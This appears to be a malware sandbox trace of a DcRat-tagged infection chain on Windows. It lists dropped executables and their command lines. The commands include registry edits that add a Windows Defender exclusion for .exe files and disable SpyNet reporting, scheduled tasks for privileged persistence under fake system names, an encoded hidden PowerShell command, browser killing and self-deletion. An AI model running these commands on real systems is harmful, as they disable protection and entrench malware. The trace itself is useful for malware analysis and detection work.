C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-70RAI.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-70RAI.tmp\setup.tmp" /SL5="$80050,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JASOE.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JASOE.tmp\setup.tmp" /SL5="$102EC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\siww1049.exe"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
C:\Users\Admin\AppData\Local\Temp\video.exe"C:\Users\Admin\AppData\Local\Temp\video.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\udontsay.exe"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\anytime1.exe"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\anytime2.exe"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\anytime3.exe"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\exz_y5si_QKvgV12SHnOl8Vv.exe"C:\Users\Admin\Pictures\Adobe Films\exz_y5si_QKvgV12SHnOl8Vv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 4604⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe"C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\TsgtelzQlR8yszDLuNQJXLZi.exe"C:\Users\Admin\Pictures\Adobe Films\TsgtelzQlR8yszDLuNQJXLZi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 4604⤵
-
C:\Users\Admin\Pictures\Adobe Films\k93jCTkUiMxXJrGKLIDgegDv.exe"C:\Users\Admin\Pictures\Adobe Films\k93jCTkUiMxXJrGKLIDgegDv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 4684⤵
-
C:\Users\Admin\Pictures\Adobe Films\DP8IfkWhlAypXNjWbEMYhZ4_.exe"C:\Users\Admin\Pictures\Adobe Films\DP8IfkWhlAypXNjWbEMYhZ4_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS41C4.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS4DF9.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKaNYAGSP" /SC once /ST 00:25:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKaNYAGSP"6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKaNYAGSP"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 12:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\HAxYUrE.exe\" j6 /site_id 525403 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe"C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Pictures\Adobe Films\CQPxSqqh31frdIRtYHOHcDzh.exe"C:\Users\Admin\Pictures\Adobe Films\CQPxSqqh31frdIRtYHOHcDzh.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\alUpx83J0MdcnebF4CuYOIst.exe"C:\Users\Admin\Pictures\Adobe Films\alUpx83J0MdcnebF4CuYOIst.exe"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe"C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Rcy3rf9yZ0fpvi47hqv6iRFs.exe"C:\Users\Admin\Pictures\Adobe Films\Rcy3rf9yZ0fpvi47hqv6iRFs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 4684⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 4764⤵
-
C:\Users\Admin\Pictures\Adobe Films\ekfdxVPEJxh3DEsyozUTNiCv.exe"C:\Users\Admin\Pictures\Adobe Films\ekfdxVPEJxh3DEsyozUTNiCv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 4684⤵
-
C:\Users\Admin\Pictures\Adobe Films\FJjQVURla01Xh9fpC6JaU94b.exe"C:\Users\Admin\Pictures\Adobe Films\FJjQVURla01Xh9fpC6JaU94b.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe"C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 6524⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 8004⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 12884⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 12964⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 13244⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "0wAdZf4lpfzXIpVqVgHL8rW_.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "0wAdZf4lpfzXIpVqVgHL8rW_.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 12924⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 39441⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3568 -ip 35681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3944 -ip 39441⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"4⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif4⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2712 -ip 27121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 624 -ip 6241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3508 -ip 35081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 828 -ip 8281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3020 -ip 30201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 836 -ip 8361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 828 -ip 8281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3020 -ip 30201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 836 -ip 8361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2712 -ip 27121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 624 -ip 6241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3508 -ip 35081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 384 -ip 3841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 384 -ip 3841⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Documents and Settings\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Netdhcpsvc\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WUDFxUninstall\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Documents and Settings\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\mfreadwrite\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "GjqJZ2_aVPLTP4_PI3IJUpKf" /sc ONLOGON /tr "'C:\odt\GjqJZ2_aVPLTP4_PI3IJUpKf.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iscsied\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 384 -ip 3841⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Files" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\wctD721\Files.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1444 -ip 14441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4684 -ip 46841⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1444 -ip 14441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1444 -ip 14441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1444 -ip 14441⤵
-
C:\Users\Admin\AppData\Roaming\vhitttgC:\Users\Admin\AppData\Roaming\vhitttg1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1444 -ip 14441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1568 -ip 15681⤵
-
